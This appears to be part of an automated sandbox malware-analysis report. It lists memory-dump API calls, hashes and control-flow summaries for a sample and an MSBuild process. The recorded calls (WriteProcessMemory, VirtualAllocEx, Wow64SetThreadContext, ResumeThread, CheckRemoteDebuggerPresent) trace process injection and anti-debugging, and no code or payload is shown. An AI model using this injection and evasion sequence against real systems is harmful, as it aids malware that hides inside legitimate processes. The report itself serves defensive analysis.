                                              • Instruction ID: 5c3210437537b04d506d02171424058d39f370f54ae0fd12e37f8dcd34669db6
                                              • Opcode Fuzzy Hash: 4c932eabfa6a398ab07fde23b1d6eb26951948ca41d0fc229c752b0f016db07c
                                              • Instruction Fuzzy Hash: 2B41E0B0C0075DCBEB24CFAAC884BDEBBB5BF89714F20815AD408AB255DB756946CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph (summary; executed/not-executed marking not captured): entry block aa449c-aa59d9 calls CreateActCtxA; successors aa59db-aa59e1 and aa59e2-aa5a3c, then aa5a3e-aa5a41 / aa5a4b-aa5a4f, aa5a51-aa5a5d and aa5a60, ending in a self-looping block at aa5a61.
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 00AA59C9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: d321f086d010babd0200c1bc306c348cab22e300967615828831037bab164264
                                              • Instruction ID: c1aba1675817031badaae41acd50c76eca146e5bc761863a2130241f420ad3fc
                                              • Opcode Fuzzy Hash: d321f086d010babd0200c1bc306c348cab22e300967615828831037bab164264
                                              • Instruction Fuzzy Hash: C041DFB0D0071DCBEB24CFAAC884B8EBBB5BF49714F20816AD408AB255DB756945CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph (summary; executed/not-executed marking not captured): entry block 23d92a0-23d92f6, directly or via 23d92f8-23d9304, reaches 23d9306-23d9345, which calls WriteProcessMemory; successors are 23d9347-23d934d and 23d934e-23d937e (the former falls through to the latter).
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 023D9338
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 7bd7c010d5989e8393d07642f770729f11ed701b581c88dc260a57e5ed231721
                                              • Instruction ID: f626e256567a4bce43cfb28315a3caca808d42ae1cd8a57456babddd110922e6
                                              • Opcode Fuzzy Hash: 7bd7c010d5989e8393d07642f770729f11ed701b581c88dc260a57e5ed231721
                                              • Instruction Fuzzy Hash: F1213772D003499FDB10CFAAC885BDEBBF5FF48714F108429E919A7240D7789955CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph (summary; executed/not-executed marking not captured): entry block 23d92a8-23d92f6, directly or via 23d92f8-23d9304, reaches 23d9306-23d9345, which calls WriteProcessMemory; successors are 23d9347-23d934d and 23d934e-23d937e (the former falls through to the latter).
                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 023D9338
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 340741a57116f23dd4f903b50219d9fc7d3a480bbf8e6b7582f13fa0367c3839
                                              • Instruction ID: abedabea0bdc6e21346faecc1d863a175b23883ff04e6d6b025f9c938cdb54f1
                                              • Opcode Fuzzy Hash: 340741a57116f23dd4f903b50219d9fc7d3a480bbf8e6b7582f13fa0367c3839
                                              • Instruction Fuzzy Hash: 63212776900349DFDB10CFAAC885BDEBBF5FF88324F108429E918A7240D7789950CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph (summary; executed/not-executed marking not captured): entry block aad2f9-aad394 calls DuplicateHandle; successors are aad396-aad39c and aad39d-aad3ba (the former falls through to the latter).
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AAD387
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: d0bd5e283b1fc49e6a97935bf353ba589710d82e5bfc68d018a295b1a0d952e4
                                              • Instruction ID: f40f7160610eb1416e9091c22f97662349d8b642249039cb6107415f9ac44e90
                                              • Opcode Fuzzy Hash: d0bd5e283b1fc49e6a97935bf353ba589710d82e5bfc68d018a295b1a0d952e4
                                              • Instruction Fuzzy Hash: 922103B5D00248DFDB10CFAAD885AEEBFF4EB48320F14801AE958A3250C375A940CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph (summary; executed/not-executed marking not captured): entry block 23d9390-23d9425 calls ReadProcessMemory; successors are 23d9427-23d942d and 23d942e-23d945e (the former falls through to the latter).
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023D9418
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: cd591d7694f855a9aa304f28fc0df7e210503ae173867e312a616617e2b21dec
                                              • Instruction ID: 22dcd6d285cd36fa54031471f9af27557e8da8be9ae859cfb8119facb2763f88
                                              • Opcode Fuzzy Hash: cd591d7694f855a9aa304f28fc0df7e210503ae173867e312a616617e2b21dec
                                              • Instruction Fuzzy Hash: FF214875D002499FDB10CFAAC881BEEBBF5FF88320F10842AE918A7241C7399500CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph (summary; executed/not-executed marking not captured): entry block 23d9108-23d915b, directly or via 23d915d-23d9169, reaches 23d916b-23d919b, which calls Wow64SetThreadContext; successors are 23d919d-23d91a3 and 23d91a4-23d91d4 (the former falls through to the latter).
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 023D918E
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 30378b09338ce875166f7042cf125b9d810c3763813d539be3cb4feaff1a7001
                                              • Instruction ID: 6c27f1042e1a46c922f46f6825651427104fabdefe076a252ac1cec7cac2c7e3
                                              • Opcode Fuzzy Hash: 30378b09338ce875166f7042cf125b9d810c3763813d539be3cb4feaff1a7001
                                              • Instruction Fuzzy Hash: 28216872D002098FDB10CFAAC485BEEBBF4EF88324F14842ED419A7241CB789945CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph (summary; executed/not-executed marking not captured): entry block 23d9398-23d9425 calls ReadProcessMemory; successors are 23d9427-23d942d and 23d942e-23d945e (the former falls through to the latter).
                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 023D9418
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 7bd68823d169e2565ad91f5881b788908ba5c9ce45309b3e149563906a34a6bb
                                              • Instruction ID: 6412e0c102eb158451d050b80b70ee43c8cc0b2b5f76322f95f0bcdc4a4c1f11
                                              • Opcode Fuzzy Hash: 7bd68823d169e2565ad91f5881b788908ba5c9ce45309b3e149563906a34a6bb
                                              • Instruction Fuzzy Hash: AD212871D003499FDB10CFAAC881BEEBBF5FF88720F108429E518A7241D779A500CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              control_flow_graph (summary; executed/not-executed marking not captured): entry block 23d9110-23d915b, directly or via 23d915d-23d9169, reaches 23d916b-23d919b, which calls Wow64SetThreadContext; successors are 23d919d-23d91a3 and 23d91a4-23d91d4 (the former falls through to the latter).
                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 023D918E
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 10298bad13d65ece7d670c81b3bc6197199d6846c3814ce7c5652f1730d39172
                                              • Instruction ID: 6e129a20e9cce11401460eeb50f96d8f4e01e0f199a0301eb519cd293e7e7b1a
                                              • Opcode Fuzzy Hash: 10298bad13d65ece7d670c81b3bc6197199d6846c3814ce7c5652f1730d39172
                                              • Instruction Fuzzy Hash: 32214971D003098FDB10CFAAC4857EEBBF4EF88724F148429D519A7241DB789945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph (rendered graph omitted)
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00AAD387
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 023D9256
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00AAB101,00000800,00000000,00000000), ref: 00AAB312
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00AAB101,00000800,00000000,00000000), ref: 00AAB312
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 023D9256
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00AAB086
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00AAB086
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176880213.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_aa0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 023DD435
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 023DD435
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2177666388.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_23d0000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176519764.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a4d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176519764.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a4d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176604000.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a5d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176604000.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a5d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176604000.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a5d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176519764.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a4d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176519764.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a4d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000009.00000002.2176604000.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_a5d000_TgfQNrhQjjseHY.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:8.4%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:13
                                              Total number of Limit Nodes:0

                                              Control-flow Graph (rendered graph omitted)
                                              APIs
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00C9FF31
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3346787906.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_c90000_MSBuild.jbxd
                                              Similarity
                                              • API ID: CallProcWindow
                                              • String ID:
                                              • API String ID: 2714655100-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph (rendered graph omitted)
                                              APIs
                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00C97127
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3346787906.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_c90000_MSBuild.jbxd
                                              Similarity
                                              • API ID: CheckDebuggerPresentRemote
                                              • String ID:
                                              • API String ID: 3662101638-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 125 c970b0-c97134 CheckRemoteDebuggerPresent 128 c9713d-c97178 125->128 129 c97136-c9713c 125->129 129->128
                                              APIs
                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00C97127
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3346787906.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_c90000_MSBuild.jbxd
                                              Similarity
                                              • API ID: CheckDebuggerPresentRemote
                                              • String ID:
                                              • API String ID: 3662101638-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3346295930.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_c4d000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3346295930.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_c4d000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%